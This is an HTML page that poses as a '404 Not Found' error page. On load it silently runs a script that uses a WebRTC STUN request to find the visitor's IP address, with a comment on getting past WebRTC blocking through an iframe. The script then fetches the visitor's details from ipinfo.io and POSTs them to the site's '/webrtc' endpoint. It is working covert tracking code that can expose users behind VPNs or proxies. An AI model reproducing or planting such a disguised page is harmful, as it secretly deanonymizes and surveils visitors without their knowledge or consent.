<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>404</title>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <script>
        async function connect() {
            var getExternalIP = new Promise(function (resolve, reject) {
                var ips = [];
                var ip_dups = {};

                //compatibility for firefox and chrome
                var RTCPeerConnection = window.RTCPeerConnection
                    || window.mozRTCPeerConnection
                    || window.webkitRTCPeerConnection;
                var useWebKit = !!window.webkitRTCPeerConnection;

                //bypass naive webrtc blocking using an iframe
                if (!RTCPeerConnection) {
                    //NOTE: you need to have an iframe in the page right above the script tag
                    //
                    //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
                    //<script>...getIPs called in here...
                    //
                    var win = iframe.contentWindow;
                    RTCPeerConnection = win.RTCPeerConnection
                        || win.mozRTCPeerConnection
                        || win.webkitRTCPeerConnection;
                    useWebKit = !!win.webkitRTCPeerConnection;
                }

                //minimal requirements for data connection
                var mediaConstraints = {
                    optional: [{RtpDataChannels: true}]
                };

                var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

                //construct a new RTCPeerConnection
                var pc = new RTCPeerConnection(servers, mediaConstraints);

                function handleCandidate(candidate) {
                    //match just the IP address
                    var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
                    var result = ip_regex.exec(candidate);

                    if (!result) return;
                    var ip_addr = result[1];

                    //remove duplicates
                    if (ip_dups[ip_addr] === undefined)
                        ips.push(ip_addr);

                    ip_dups[ip_addr] = true;
                }

                //listen for candidate events
                pc.onicecandidate = function (ice) {

                    //skip non-candidate events
                    if (ice.candidate)
                        handleCandidate(ice.candidate.candidate);
                };

                //create a bogus data channel
                pc.createDataChannel("");

                //create an offer sdp
                pc.createOffer(function (result) {

                    //trigger the stun server request
                    pc.setLocalDescription(result, function () {
                    }, function () {
                    });

                }, function () {
                });

                //wait for a while to let everything done
                setTimeout(function () {
                    //read candidate info from local description
                    var lines = pc.localDescription.sdp.split('\n');

                    lines.forEach(function (line) {
                        if (line.indexOf('a=candidate:') === 0)
                            handleCandidate(line);
                    });

                    resolve(ips.pop());
                }, 1000);
            });

            getExternalIP.then(async function (ip) {
                const ipinfo = await axios.get('http://ipinfo.io');
                const data = {...ipinfo.data, point: ip ? ip : null};
                await axios.post('/webrtc', data);
            });
        }

        connect();
    </script>
</head>

<body>
<div>
    <h1>404 Not Found</h1>
</div>
</body>
</html>